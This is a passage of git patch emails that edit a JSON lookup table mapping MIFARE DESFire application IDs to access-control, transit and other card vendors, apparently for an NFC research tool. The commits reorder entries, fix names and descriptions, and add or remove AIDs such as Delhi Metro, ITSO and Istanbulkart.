"AID": "F4812A", + "Vendor": "Gallagher Group Limited via PEC [New Zealand] Limited", + "Country": "NZ", + "Name": "Gallagher Security Credential", + "Description": "Cardax Card Data Application", + "Type": "pacs" + }, + { + "AID": "F4812B", + "Vendor": "Gallagher Group Limited via PEC [New Zealand] Limited", + "Country": "NZ", + "Name": "Gallagher Security Credential", + "Description": "Cardax Card Data Application", + "Type": "pacs" + }, + { + "AID": "F4812C", + "Vendor": "Gallagher Group Limited via PEC [New Zealand] Limited", + "Country": "NZ", + "Name": "Gallagher Security Credential", + "Description": "Unused Cardax Card Data Application", + "Type": "pacs" + }, + { + "AID": "F4812D", + "Vendor": "Gallagher Group Limited via PEC [New Zealand] Limited", + "Country": "NZ", + "Name": "Gallagher Security Credential", + "Description": "Unused Cardax Card Data Application", + "Type": "pacs" + }, + { + "AID": "F4812E", + "Vendor": "Gallagher Group Limited via PEC [New Zealand] Limited", + "Country": "NZ", + "Name": "Gallagher Security Credential", + "Description": "Unused Cardax Card Data Application", + "Type": "pacs" + }, + { + "AID": "F4812F", + "Vendor": "Gallagher Group Limited via PEC [New Zealand] Limited", + "Country": "NZ", + "Name": "Gallagher Security Credential", "Description": "Card Application Directory [CAD]", "Type": "pacs" }, From 19defef18bd1800a4065636c2b269dd2ebaba667 Mon Sep 17 00:00:00 2001 From: ry4000 <154689120+ry4000@users.noreply.github.com> Date: Mon, 24 Jun 2024 15:47:41 +1000 Subject: [PATCH 059/112] Update aid_desfire.json Rearranged the pacs AID order. Signed-off-by: ry4000 <154689120+ry4000@users.noreply.github.com> --- client/resources/aid_desfire.json | 80 +++++++++++++++---------------- 1 file changed, 40 insertions(+), 40 deletions(-) diff --git a/client/resources/aid_desfire.json b/client/resources/aid_desfire.json index 331b76cf2..12113e8eb 100644 --- a/client/resources/aid_desfire.json +++ b/client/resources/aid_desfire.json @@ -15,6 +15,46 @@ "Description": "FID 02: EF-CONF", "Type": "pacs" }, + { + "AID": "4791DA", + "Vendor": "Prima Systems", + "Country": "SI", + "Name": "Prima FlexAir Access Control", + "Description": "FIDs 00: DRM; 01: Access Event Log; 04: Access Permissions", + "Type": "pacs" + }, + { + "AID": "53494F", + "Vendor": "HID", + "Country": "US", + "Name": "Access Control", + "Description": "HID Factory", + "Type": "pacs" + }, + { + "AID": "6F706C", + "Vendor": "Openpath", + "Country": "US", + "Name": "Access control", + "Description": "Openpath PACS Application", + "Type": "pacs" + }, + { + "AID": "D3494F", + "Vendor": "HID", + "Country": "US", + "Name": "SIO DESFire EV1", + "Description": "Field Encoder", + "Type": "pacs" + }, + { + "AID": "D9494F", + "Vendor": "HID", + "Country": "US", + "Name": "Access control", + "Description": "Field Encoder", + "Type": "pacs" + }, { "AID": "F48120", "Vendor": "Gallagher Group Limited via PEC [New Zealand] Limited", @@ -143,46 +183,6 @@ "Description": "Card Application Directory [CAD]", "Type": "pacs" }, - { - "AID": "4791DA", - "Vendor": "Prima Systems", - "Country": "SI", - "Name": "Prima FlexAir Access Control", - "Description": "FIDs 00: DRM; 01: Access Event Log; 04: Access Permissions", - "Type": "pacs" - }, - { - "AID": "53494F", - "Vendor": "HID", - "Country": "US", - "Name": "Access Control", - "Description": "HID Factory", - "Type": "pacs" - }, - { - "AID": "6F706C", - "Vendor": "Openpath", - "Country": "US", - "Name": "Access control", - "Description": "Openpath PACS Application", - "Type": "pacs" - }, - { - "AID": "D3494F", - "Vendor": "HID", - "Country": "US", - "Name": "SIO DESFire EV1", - "Description": "Field Encoder", - "Type": "pacs" - }, - { - "AID": "D9494F", - "Vendor": "HID", - "Country": "US", - "Name": "Access control", - "Description": "Field Encoder", - "Type": "pacs" - }, { "AID": "F48EF1", "Vendor": "Salto Systems", From 323414b2b0fc2d996d80c2ca1dda63b2a84c23d2 Mon Sep 17 00:00:00 2001 From: ry4000 <154689120+ry4000@users.noreply.github.com> Date: Wed, 26 Jun 2024 14:21:53 +1000 Subject: [PATCH 060/112] Update aid_desfire.json Interim checks made using NXP TagInfo. Removed duplicate AID [Disney MagicBand], which had an entry with its AID bytes reversed. Signed-off-by: ry4000 <154689120+ry4000@users.noreply.github.com> --- client/resources/aid_desfire.json | 18 +++++------------- 1 file changed, 5 insertions(+), 13 deletions(-) diff --git a/client/resources/aid_desfire.json b/client/resources/aid_desfire.json index 12113e8eb..dbb3f46d3 100644 --- a/client/resources/aid_desfire.json +++ b/client/resources/aid_desfire.json @@ -3,7 +3,7 @@ "AID": "EEEE10", "Vendor": "NFC Forum", "Country": "US", - "Name": "NFC Forum NDEF Tag", + "Name": "NDEF Tag — Type 4 Version 1", "Description": "FID 03: Capability Container", "Type": "ndef" }, @@ -399,14 +399,6 @@ "Description": "", "Type": "student" }, - { - "AID": "27E178", - "Vendor": "Disney", - "Country": "US", - "Name": "Disney MagicBand", - "Description": "", - "Type": "payment system" - }, { "AID": "44434C", "Vendor": "Disney", @@ -428,7 +420,7 @@ "Vendor": "Alfa-Zet", "Country": "BE", "Name": "ping.ping Tag", - "Description": "ping.ping Tag", + "Description": "ping.ping App 1", "Type": "payment system" }, { @@ -436,7 +428,7 @@ "Vendor": "Alfa-Zet", "Country": "BE", "Name": "ping.ping Tag", - "Description": "ping.ping Tag", + "Description": "ping.ping App 2", "Type": "payment system" }, { @@ -444,7 +436,7 @@ "Vendor": "Alfa-Zet", "Country": "BE", "Name": "ping.ping Tag", - "Description": "ping.ping Tag", + "Description": "ping.ping App 3", "Type": "payment system" }, { @@ -452,7 +444,7 @@ "Vendor": "Alfa-Zet", "Country": "BE", "Name": "ping.ping Tag", - "Description": "ping.ping Tag", + "Description": "ping.ping App 4", "Type": "payment system" }, { From 3ccf2386163b619b4211cfa941e4c8be28f89917 Mon Sep 17 00:00:00 2001 From: ry4000 <154689120+ry4000@users.noreply.github.com> Date: Wed, 26 Jun 2024 14:25:19 +1000 Subject: [PATCH 061/112] Update aid_desfire.json Interim Checks on NXP TagInfo. Signed-off-by: ry4000 <154689120+ry4000@users.noreply.github.com> --- client/resources/aid_desfire.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/client/resources/aid_desfire.json b/client/resources/aid_desfire.json index dbb3f46d3..6c8a1ac6b 100644 --- a/client/resources/aid_desfire.json +++ b/client/resources/aid_desfire.json @@ -457,10 +457,10 @@ }, { "AID": "C26001", - "Vendor": "CAR2GO", + "Vendor": "car2go", "Country": "DE", "Name": "MemberCard", - "Description": "CAR2GO - Member Card", + "Description": "car2go - Member Card / Multi Functional Badge / Private Application #1", "Type": "carsharing" }, { From 86fd5456e2add50d08df658cbd4a5a9411d1e387 Mon Sep 17 00:00:00 2001 From: ry4000 <154689120+ry4000@users.noreply.github.com> Date: Wed, 26 Jun 2024 17:48:55 +1000 Subject: [PATCH 062/112] Update aid_desfire.json Formatting updates. Signed-off-by: ry4000 <154689120+ry4000@users.noreply.github.com> --- client/resources/aid_desfire.json | 114 +++++++++++++++--------------- 1 file changed, 57 insertions(+), 57 deletions(-) diff --git a/client/resources/aid_desfire.json b/client/resources/aid_desfire.json index 6c8a1ac6b..3f7cfb891 100644 --- a/client/resources/aid_desfire.json +++ b/client/resources/aid_desfire.json @@ -57,7 +57,7 @@ }, { "AID": "F48120", - "Vendor": "Gallagher Group Limited via PEC [New Zealand] Limited", + "Vendor": "Gallagher Group Limited via PEC (New Zealand) Limited", "Country": "NZ", "Name": "Gallagher Security Credential", "Description": "Cardax Card Data Application", @@ -65,7 +65,7 @@ }, { "AID": "F48121", - "Vendor": "Gallagher Group Limited via PEC [New Zealand] Limited", + "Vendor": "Gallagher Group Limited via PEC (New Zealand) Limited", "Country": "NZ", "Name": "Gallagher Security Credential", "Description": "Cardax Card Data Application", @@ -73,7 +73,7 @@ }, { "AID": "F48122", - "Vendor": "Gallagher Group Limited via PEC [New Zealand] Limited", + "Vendor": "Gallagher Group Limited via PEC (New Zealand) Limited", "Country": "NZ", "Name": "Gallagher Security Credential", "Description": "Cardax Card Data Application", @@ -81,7 +81,7 @@ }, { "AID": "F48123", - "Vendor": "Gallagher Group Limited via PEC [New Zealand] Limited", + "Vendor": "Gallagher Group Limited via PEC (New Zealand) Limited", "Country": "NZ", "Name": "Gallagher Security Credential", "Description": "Cardax Card Data Application", @@ -89,7 +89,7 @@ }, { "AID": "F48124", - "Vendor": "Gallagher Group Limited via PEC [New Zealand] Limited", + "Vendor": "Gallagher Group Limited via PEC (New Zealand) Limited", "Country": "NZ", "Name": "Gallagher Security Credential", "Description": "Cardax Card Data Application", @@ -97,7 +97,7 @@ }, { "AID": "F48125", - "Vendor": "Gallagher Group Limited via PEC [New Zealand] Limited", + "Vendor": "Gallagher Group Limited via PEC (New Zealand) Limited", "Country": "NZ", "Name": "Gallagher Security Credential", "Description": "Cardax Card Data Application", @@ -105,7 +105,7 @@ }, { "AID": "F48126", - "Vendor": "Gallagher Group Limited via PEC [New Zealand] Limited", + "Vendor": "Gallagher Group Limited via PEC (New Zealand) Limited", "Country": "NZ", "Name": "Gallagher Security Credential", "Description": "Cardax Card Data Application", @@ -113,7 +113,7 @@ }, { "AID": "F48127", - "Vendor": "Gallagher Group Limited via PEC [New Zealand] Limited", + "Vendor": "Gallagher Group Limited via PEC (New Zealand) Limited", "Country": "NZ", "Name": "Gallagher Security Credential", "Description": "Cardax Card Data Application", @@ -121,7 +121,7 @@ }, { "AID": "F48128", - "Vendor": "Gallagher Group Limited via PEC [New Zealand] Limited", + "Vendor": "Gallagher Group Limited via PEC (New Zealand) Limited", "Country": "NZ", "Name": "Gallagher Security Credential", "Description": "Cardax Card Data Application", @@ -129,7 +129,7 @@ }, { "AID": "F48129", - "Vendor": "Gallagher Group Limited via PEC [New Zealand] Limited", + "Vendor": "Gallagher Group Limited via PEC (New Zealand) Limited", "Country": "NZ", "Name": "Gallagher Security Credential", "Description": "Cardax Card Data Application", @@ -137,7 +137,7 @@ }, { "AID": "F4812A", - "Vendor": "Gallagher Group Limited via PEC [New Zealand] Limited", + "Vendor": "Gallagher Group Limited via PEC (New Zealand) Limited", "Country": "NZ", "Name": "Gallagher Security Credential", "Description": "Cardax Card Data Application", @@ -145,7 +145,7 @@ }, { "AID": "F4812B", - "Vendor": "Gallagher Group Limited via PEC [New Zealand] Limited", + "Vendor": "Gallagher Group Limited via PEC (New Zealand) Limited", "Country": "NZ", "Name": "Gallagher Security Credential", "Description": "Cardax Card Data Application", @@ -153,7 +153,7 @@ }, { "AID": "F4812C", - "Vendor": "Gallagher Group Limited via PEC [New Zealand] Limited", + "Vendor": "Gallagher Group Limited via PEC (New Zealand) Limited", "Country": "NZ", "Name": "Gallagher Security Credential", "Description": "Unused Cardax Card Data Application", @@ -161,7 +161,7 @@ }, { "AID": "F4812D", - "Vendor": "Gallagher Group Limited via PEC [New Zealand] Limited", + "Vendor": "Gallagher Group Limited via PEC (New Zealand) Limited", "Country": "NZ", "Name": "Gallagher Security Credential", "Description": "Unused Cardax Card Data Application", @@ -169,7 +169,7 @@ }, { "AID": "F4812E", - "Vendor": "Gallagher Group Limited via PEC [New Zealand] Limited", + "Vendor": "Gallagher Group Limited via PEC (New Zealand) Limited", "Country": "NZ", "Name": "Gallagher Security Credential", "Description": "Unused Cardax Card Data Application", @@ -177,7 +177,7 @@ }, { "AID": "F4812F", - "Vendor": "Gallagher Group Limited via PEC [New Zealand] Limited", + "Vendor": "Gallagher Group Limited via PEC (New Zealand) Limited", "Country": "NZ", "Name": "Gallagher Security Credential", "Description": "Card Application Directory [CAD]", @@ -460,7 +460,7 @@ "Vendor": "car2go", "Country": "DE", "Name": "MemberCard", - "Description": "car2go - Member Card / Multi Functional Badge / Private Application #1", + "Description": "car2go - Member Card // Multi Functional Badge / Private Application #1", "Type": "carsharing" }, { @@ -475,15 +475,15 @@ "AID": "002000", "Vendor": "Metrolinx", "Country": "CA", - "Name": "PRESTO Card [YYZ/YHM/YOW]", + "Name": "PRESTO Card (YYZ/YHM/YOW)", "Description": "FIDs 00,0F: Backup Data; 08-0E,10-14: Standard Data", "Type": "transport" }, { "AID": "010000", - "Vendor": "Consorcio Regional de Transportes Públicos Regulares de Madrid [CRTM]", + "Vendor": "Consorcio Regional de Transportes Públicos Regulares de Madrid (CRTM)", "Country": "ES", - "Name": "Tarjeta Transporte Publico [MAD]", + "Name": "Tarjeta Transporte Publico (MAD)", "Description": "MAD Public Transport Card", "Type": "transport" }, @@ -491,15 +491,15 @@ "AID": "012242", "Vendor": "Istanbulkart", "Country": "TR", - "Name": "Istanbulkart [IST]", + "Name": "Istanbulkart (IST)", "Description": "IST Istanbul Card", "Type": "transport" }, { "AID": "015342", - "Vendor": "Bangkok Expressway and Metro Public Limited Company [BEM]", + "Vendor": "Bangkok Expressway and Metro Public Limited Company (BEM)", "Country": "TH", - "Name": "MRT Stored Value Card [BKK]", + "Name": "MRT Stored Value Card (BKK)", "Description": "Might also be used by BKK MRT Plus and/or BKK Park & Ride Plus Cards", "Type": "transport" }, @@ -507,15 +507,15 @@ "AID": "2211AF", "Vendor": "National Transport Authority", "Country": "IE", - "Name": "TFI Leap Card [DUB]", + "Name": "TFI Leap Card (DUB)", "Description": "DUB Leap Card // Transport for Ireland // FIDs: 01,1F: Backup Data; 02-0A: Standard Data", "Type": "transport" }, { "AID": "4F5931", - "Vendor": "Transport for London [TfL]", + "Vendor": "Transport for London (TfL)", "Country": "UK", - "Name": "Oyster Card [LHR]", + "Name": "Oyster Card (LHR)", "Description": "FIDs: 00-07: Standard Data", "Type": "transport" }, @@ -523,15 +523,15 @@ "AID": "422201", "Vendor": "Transport of Istanbul", "Country": "TR", - "Name": "İstanbulkart [IST]", + "Name": "İstanbulkart (IST)", "Description": "IST Istanbul Card", "Type": "transport" }, { "AID": "534531", - "Vendor": "Transport for New South Wales [TfNSW]", + "Vendor": "Transport for New South Wales (TfNSW)", "Country": "AU", - "Name": "Opal Card [SYD]", + "Name": "Opal Card (SYD)", "Description": "FIDs 00-06: Standard Data; 07: Card Balance/Number and Trip History", "Type": "transport" }, @@ -539,13 +539,13 @@ "AID": "554000", "Vendor": "Auckland Transport", "Country": "NZ", - "Name": "AT HOP Card [AKL]", + "Name": "AT HOP Card (AKL)", "Description": "FIDs: 00: Backup Data; 08/09/0A", "Type": "transport" }, { "AID": "578000", - "Vendor": "Norwegian Public Roads Administration [NPRA]", + "Vendor": "Norwegian Public Roads Administration (NPRA)", "Country": "NO", "Name": "NORTIC Transport", "Description": "Norwegian Ticketing Interoperable Concept // FID 0C: Card Issuer Header", @@ -553,7 +553,7 @@ }, { "AID": "578001", - "Vendor": "Norwegian Public Roads Administration [NPRA]", + "Vendor": "Norwegian Public Roads Administration (NPRA)", "Country": "NO", "Name": "NORTIC Transport", "Description": "FIDs 01: Product Retailer; 02: Service Provider; 03: Special Event; 04: Stored Value; 05: General Event Log; 06: SV Reload Log; 0A: Environment; 0C: Card Holder", @@ -561,9 +561,9 @@ }, { "AID": "784000", - "Vendor": "Roads & Transport Authority [Government of Dubai]", + "Vendor": "Roads & Transport Authority (Government of Dubai)", "Country": "AE", - "Name": "nol Card [DXB]", + "Name": "nol Card (DXB)", "Description": "DXB nol Card", "Type": "transport" }, @@ -571,15 +571,15 @@ "AID": "A00216", "Vendor": "ITSO Ltd", "Country": "UK", - "Name": "ITSO", - "Description": "Appears to be used across UK Transit Agencies except LHR Oyster.", + "Name": "EMR Smartcard (EMA) / GWR touch (SWI)", + "Description": "ITSO Public Transport Application // Provision of Citizen Services #0", "Type": "transport" }, { "AID": "EF2011", - "Vendor": "Helsinki Region Transport [HRT]", + "Vendor": "Helsinki Region Transport (HRT)", "Country": "FI", - "Name": "HSL Card [HEL/TLL/TAY]", + "Name": "HSL Card (HEL/TLL/TAY)", "Description": "HEL/TLL/TAY HSL Card", "Type": "transport" }, @@ -587,15 +587,15 @@ "AID": "F001D0", "Vendor": "Arabako Foru Aldundia", "Country": "ES", - "Name": "BAT Card [VIT]", + "Name": "BAT Card (VIT)", "Description": "VIT BAT Card", "Type": "transport" }, { "AID": "F206B0", - "Vendor": "Adelaide Metro via Affiliated Computer Services [ACS]", + "Vendor": "Adelaide Metro via Affiliated Computer Services (ACS)", "Country": "AU", - "Name": "metroCARD [ADL]", + "Name": "metroCARD (ADL)", "Description": "FIDs 00,02-07,09-0B,10-17,1B-1C: Backup Data; 01,1D: Linear Record File; 08: ABNote/HID Adelaide; 1E: Standard Data; 0C-0F: Card Balance", "Type": "transport" }, @@ -611,7 +611,7 @@ "AID": "F21050", "Vendor": "Metro Christchurch via INIT", "Country": "NZ", - "Name": "Metrocard [CHC]", + "Name": "Metrocard (CHC)", "Description": "FIDs: 00: Backup Data; 01/02: Trip History; 03: Card Balance", "Type": "transport" }, @@ -619,23 +619,23 @@ "AID": "F210E0", "Vendor": "TriMet", "Country": "US", - "Name": "Hop Fastpass [PDX]", + "Name": "Hop Fastpass (PDX)", "Description": "PDX Hop Card", "Type": "transport" }, { "AID": "F210F0", - "Vendor": "Public Transport Victoria [PTV] via Conduent [formerly via Keane Australia Pty Ltd]", + "Vendor": "Public Transport Victoria (PTV) via Conduent (formerly via Keane Australia Pty Ltd)", "Country": "AU", - "Name": "myki [MEL]", + "Name": "myki (MEL)", "Description": "FIDs 01-02: Transaction History; 03: myki money Balance; 00,04-05: Backup Data; 08-0C,0F: Standard Data", "Type": "transport" }, { "AID": "F21100", - "Vendor": "Public Transport Victoria [PTV] via Conduent [formerly via Keane Australia Pty Ltd]", + "Vendor": "Public Transport Victoria (PTV) via Conduent (formerly via Keane Australia Pty Ltd)", "Country": "AU", - "Name": "myki [MEL]", + "Name": "myki (MEL)", "Description": "FIDs 0F: Standard Data; 00: Backup Data", "Type": "transport" }, @@ -643,7 +643,7 @@ "AID": "F21150", "Vendor": "Prague Public Transit Company via Haguess a.s.", "Country": "CZ", - "Name": "Lítačka Opencard [PRG]", + "Name": "Lítačka Opencard (PRG)", "Description": "PRG Lítačka Opencard", "Type": "transport" }, @@ -651,7 +651,7 @@ "AID": "F21190", "Vendor": "Metropolitan Transportation Commission via Cubic", "Country": "US", - "Name": "Clipper Card [SFO]", + "Name": "Clipper Card (SFO)", "Description": "FIDs 02: Card Balance; 04: Refill History; 08: Card Information; 0E: Trip History", "Type": "transport" }, @@ -659,15 +659,15 @@ "AID": "F21360", "Vendor": "INIT", "Country": "US", - "Name": "HOLO Card [HNL]", + "Name": "HOLO Card (HNL)", "Description": "HNL HOLO Card", "Type": "transport" }, { "AID": "F21381", - "Vendor": "Chicago Transit Authority [CTA] via Cubic", + "Vendor": "Chicago Transit Authority (CTA) via Cubic", "Country": "US", - "Name": "Ventra Card [ORD]", + "Name": "Ventra Card (ORD)", "Description": "ORD Ventra Card [Gen 2 Blue] // Multi-Modal Transit #1 // FIDs 00-01: Standard Data", "Type": "transport" }, @@ -675,15 +675,15 @@ "AID": "F21390", "Vendor": "Multiple NZ Transit Agencies via Otago Regional Council", "Country": "NZ", - "Name": "Bee Card [DUD]", + "Name": "Bee Card (DUD)", "Description": "Multi-Modal Transit #0 // FIDs 00: Backup Data; 01-02: Trip History; 03: Card Balance", "Type": "transport" }, { "AID": "F213A0", - "Vendor": "Rhode Island Public Transport Authority [RIPTA] via INIT", + "Vendor": "Rhode Island Public Transport Authority (RIPTA) via INIT", "Country": "US", - "Name": "Wave Smart Card [PVD]", + "Name": "Wave Smart Card (PVD)", "Description": "PVD Wave Smart Card", "Type": "transport" }, @@ -691,7 +691,7 @@ "AID": "F213F0", "Vendor": "Puget Sound Transit Agencies via Vix Technologies", "Country": "US", - "Name": "ORCA [SEA]", + "Name": "ORCA (SEA)", "Description": "One Regional Card for All // FIDs 00: Standard Data; 01: Backup Data", "Type": "transport" }, @@ -699,7 +699,7 @@ "AID": "FF30FF", "Vendor": "Metrolinx", "Country": "CA", - "Name": "PRESTO Card [YYZ/YHM/YOW]", + "Name": "PRESTO Card (YYZ/YHM/YOW)", "Description": "FID 08: Standard Data", "Type": "transport" }, From 7e109865ba796842f6136b85371ba563f9979438 Mon Sep 17 00:00:00 2001 From: ry4000 <154689120+ry4000@users.noreply.github.com> Date: Thu, 27 Jun 2024 10:18:03 +1000 Subject: [PATCH 063/112] Update aid_desfire.json Added ITSO AIDs Removed Incorrect IST Istanbulkart AID Made corrections to VIT BAT description Made other formatting corrections Signed-off-by: ry4000 <154689120+ry4000@users.noreply.github.com> --- client/resources/aid_desfire.json | 50 +++++++++++++++++++++++-------- 1 file changed, 37 insertions(+), 13 deletions(-) diff --git a/client/resources/aid_desfire.json b/client/resources/aid_desfire.json index 3f7cfb891..c4b8f2ca8 100644 --- a/client/resources/aid_desfire.json +++ b/client/resources/aid_desfire.json @@ -489,10 +489,10 @@ }, { "AID": "012242", - "Vendor": "Istanbulkart", + "Vendor": "Belbim", "Country": "TR", "Name": "Istanbulkart (IST)", - "Description": "IST Istanbul Card", + "Description": "IST Istanbul Card (eBilet App)", "Type": "transport" }, { @@ -519,14 +519,6 @@ "Description": "FIDs: 00-07: Standard Data", "Type": "transport" }, - { - "AID": "422201", - "Vendor": "Transport of Istanbul", - "Country": "TR", - "Name": "İstanbulkart (IST)", - "Description": "IST Istanbul Card", - "Type": "transport" - }, { "AID": "534531", "Vendor": "Transport for New South Wales (TfNSW)", @@ -547,7 +539,7 @@ "AID": "578000", "Vendor": "Norwegian Public Roads Administration (NPRA)", "Country": "NO", - "Name": "NORTIC Transport", + "Name": "NORTIC (Norway Public Transport Card)", "Description": "Norwegian Ticketing Interoperable Concept // FID 0C: Card Issuer Header", "Type": "transport" }, @@ -555,7 +547,7 @@ "AID": "578001", "Vendor": "Norwegian Public Roads Administration (NPRA)", "Country": "NO", - "Name": "NORTIC Transport", + "Name": "NORTIC (Norway Public Transport Card)", "Description": "FIDs 01: Product Retailer; 02: Service Provider; 03: Special Event; 04: Stored Value; 05: General Event Log; 06: SV Reload Log; 0A: Environment; 0C: Card Holder", "Type": "transport" }, @@ -588,7 +580,7 @@ "Vendor": "Arabako Foru Aldundia", "Country": "ES", "Name": "BAT Card (VIT)", - "Description": "VIT BAT Card", + "Description": "VIT BAT Card // Used on Euskotren // Interoperable PT Card", "Type": "transport" }, { @@ -695,6 +687,38 @@ "Description": "One Regional Card for All // FIDs 00: Standard Data; 01: Backup Data", "Type": "transport" }, + { + "AID": "F40110", + "Vendor": "ITSO Ltd", + "Country": "UK", + "Name": "EMR Smartcard (EMA) / GWR touch (SWI)", + "Description": "UK National Smartcard Project // Provision of Citizen Services #1", + "Type": "transport" + }, + { + "AID": "F40111", + "Vendor": "ITSO Ltd", + "Country": "UK", + "Name": "EMR Smartcard (EMA) / GWR touch (SWI)", + "Description": "UK National Smartcard Project // Provision of Citizen Services #2", + "Type": "transport" + }, + { + "AID": "F40112", + "Vendor": "ITSO Ltd", + "Country": "UK", + "Name": "EMR Smartcard (EMA) / GWR touch (SWI)", + "Description": "UK National Smartcard Project // Provision of Citizen Services #3", + "Type": "transport" + }, + { + "AID": "F40113", + "Vendor": "ITSO Ltd", + "Country": "UK", + "Name": "EMR Smartcard (EMA) / GWR touch (SWI)", + "Description": "UK National Smartcard Project // Provision of Citizen Services #4", + "Type": "transport" + }, { "AID": "FF30FF", "Vendor": "Metrolinx", From d8d2aed2df9f5486c165035e92d23389d0ed1bda Mon Sep 17 00:00:00 2001 From: ry4000 <154689120+ry4000@users.noreply.github.com> Date: Thu, 27 Jun 2024 10:22:52 +1000 Subject: [PATCH 064/112] Update aid_desfire.json Added ICT PACS AIDs and updated AID descriptions Signed-off-by: ry4000 <154689120+ry4000@users.noreply.github.com> --- client/resources/aid_desfire.json | 34 ++++++++++++++++++++++++++++++- 1 file changed, 33 insertions(+), 1 deletion(-) diff --git a/client/resources/aid_desfire.json b/client/resources/aid_desfire.json index c4b8f2ca8..49561162b 100644 --- a/client/resources/aid_desfire.json +++ b/client/resources/aid_desfire.json @@ -15,6 +15,14 @@ "Description": "FID 02: EF-CONF", "Type": "pacs" }, + { + "AID": "1023F5", + "Vendor": "Integrated Control Technology Limited [ICT]", + "Country": "NZ", + "Name": "ICT Access Credential", + "Description": "Default Secondary Application", + "Type": "pacs" + }, { "AID": "4791DA", "Vendor": "Prima Systems", @@ -212,7 +220,31 @@ "Vendor": "Integrated Control Technology Limited [ICT]", "Country": "NZ", "Name": "ICT Access Credential", - "Description": "", + "Description": "Default Primary Application", + "Type": "pacs" + }, + { + "AID": "F52318", + "Vendor": "Integrated Control Technology Limited [ICT]", + "Country": "NZ", + "Name": "ICT Access Credential", + "Description": "Default Custom Application", + "Type": "pacs" + }, + { + "AID": "F5231E", + "Vendor": "Integrated Control Technology Limited [ICT]", + "Country": "NZ", + "Name": "ICT Access Credential", + "Description": "Interoperability Application", + "Type": "pacs" + }, + { + "AID": "F5231F", + "Vendor": "Integrated Control Technology Limited [ICT]", + "Country": "NZ", + "Name": "ICT Access Credential", + "Description": "Third-Party Locking Application", "Type": "pacs" }, { From 4b3afbfac452d8ece084059140d7a43afc95b826 Mon Sep 17 00:00:00 2001 From: ry4000 <154689120+ry4000@users.noreply.github.com> Date: Thu, 27 Jun 2024 21:37:50 +1000 Subject: [PATCH 065/112] Update aid_desfire.json Added DEL Delhi Metro AIDs Signed-off-by: ry4000 <154689120+ry4000@users.noreply.github.com> --- client/resources/aid_desfire.json | 56 +++++++++++++++++++++++++++++++ 1 file changed, 56 insertions(+) diff --git a/client/resources/aid_desfire.json b/client/resources/aid_desfire.json index 49561162b..7cf38aeeb 100644 --- a/client/resources/aid_desfire.json +++ b/client/resources/aid_desfire.json @@ -527,6 +527,14 @@ "Description": "IST Istanbul Card (eBilet App)", "Type": "transport" }, + { + "AID": "014D44", + "Vendor": "Delhi Metro Rail Corporation Limited", + "Country": "IN", + "Name": "Delhi Metro Travel Card (DEL)", + "Description": "DEL Delhi Metro App 1", + "Type": "transport" + }, { "AID": "015342", "Vendor": "Bangkok Expressway and Metro Public Limited Company (BEM)", @@ -535,6 +543,54 @@ "Description": "Might also be used by BKK MRT Plus and/or BKK Park & Ride Plus Cards", "Type": "transport" }, + { + "AID": "024D44", + "Vendor": "Delhi Metro Rail Corporation Limited", + "Country": "IN", + "Name": "Delhi Metro Travel Card (DEL)", + "Description": "DEL Delhi Metro App 2", + "Type": "transport" + }, + { + "AID": "034D44", + "Vendor": "Delhi Metro Rail Corporation Limited", + "Country": "IN", + "Name": "Delhi Metro Travel Card (DEL)", + "Description": "DEL Delhi Metro App 3", + "Type": "transport" + }, + { + "AID": "044D44", + "Vendor": "Delhi Metro Rail Corporation Limited", + "Country": "IN", + "Name": "Delhi Metro Travel Card (DEL)", + "Description": "DEL Delhi Metro App 4", + "Type": "transport" + }, + { + "AID": "054D44", + "Vendor": "Delhi Metro Rail Corporation Limited", + "Country": "IN", + "Name": "Delhi Metro Travel Card (DEL)", + "Description": "DEL Delhi Metro App 5", + "Type": "transport" + }, + { + "AID": "064D44", + "Vendor": "Delhi Metro Rail Corporation Limited", + "Country": "IN", + "Name": "Delhi Metro Travel Card (DEL)", + "Description": "DEL Delhi Metro App 6", + "Type": "transport" + }, + { + "AID": "074D44", + "Vendor": "Delhi Metro Rail Corporation Limited", + "Country": "IN", + "Name": "Delhi Metro Travel Card (DEL)", + "Description": "DEL Delhi Metro App 7", + "Type": "transport" + }, { "AID": "2211AF", "Vendor": "National Transport Authority", From 4da758adaa9367351d29361221a0e2443df86a09 Mon Sep 17 00:00:00 2001 From: ry4000 <154689120+ry4000@users.noreply.github.com> Date: Thu, 27 Jun 2024 21:59:05 +1000 Subject: [PATCH 066/112] Update aid_desfire.json Added additional IST Istanbulkart AIDs Signed-off-by: ry4000 <154689120+ry4000@users.noreply.github.com> --- client/resources/aid_desfire.json | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) diff --git a/client/resources/aid_desfire.json b/client/resources/aid_desfire.json index 7cf38aeeb..5a31d3ac9 100644 --- a/client/resources/aid_desfire.json +++ b/client/resources/aid_desfire.json @@ -567,6 +567,14 @@ "Description": "DEL Delhi Metro App 4", "Type": "transport" }, + { + "AID": "052242", + "Vendor": "Belbim", + "Country": "TR", + "Name": "Istanbulkart (IST)", + "Description": "IST Istanbul Card (ISPARK App)", + "Type": "transport" + }, { "AID": "054D44", "Vendor": "Delhi Metro Rail Corporation Limited", @@ -575,6 +583,14 @@ "Description": "DEL Delhi Metro App 5", "Type": "transport" }, + { + "AID": "062242", + "Vendor": "Belbim", + "Country": "TR", + "Name": "Istanbulkart (IST)", + "Description": "IST Istanbul Card (App 6)", + "Type": "transport" + }, { "AID": "064D44", "Vendor": "Delhi Metro Rail Corporation Limited", From 0847ec48191db38f23617c28fdb7bbd4e1ca605d Mon Sep 17 00:00:00 2001 From: ry4000 <154689120+ry4000@users.noreply.github.com> Date: Sat, 29 Jun 2024 10:42:09 +1000 Subject: [PATCH 067/112] Update aid_desfire.json Updated GWR touch IATA code; SWI is apparently a closed airport. Signed-off-by: ry4000 <154689120+ry4000@users.noreply.github.com> --- client/resources/aid_desfire.json | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/client/resources/aid_desfire.json b/client/resources/aid_desfire.json index 5a31d3ac9..237db3297 100644 --- a/client/resources/aid_desfire.json +++ b/client/resources/aid_desfire.json @@ -667,7 +667,7 @@ "AID": "A00216", "Vendor": "ITSO Ltd", "Country": "UK", - "Name": "EMR Smartcard (EMA) / GWR touch (SWI)", + "Name": "EMR Smartcard (EMA) / GWR touch (BRS)", "Description": "ITSO Public Transport Application // Provision of Citizen Services #0", "Type": "transport" }, @@ -795,7 +795,7 @@ "AID": "F40110", "Vendor": "ITSO Ltd", "Country": "UK", - "Name": "EMR Smartcard (EMA) / GWR touch (SWI)", + "Name": "EMR Smartcard (EMA) / GWR touch (BRS)", "Description": "UK National 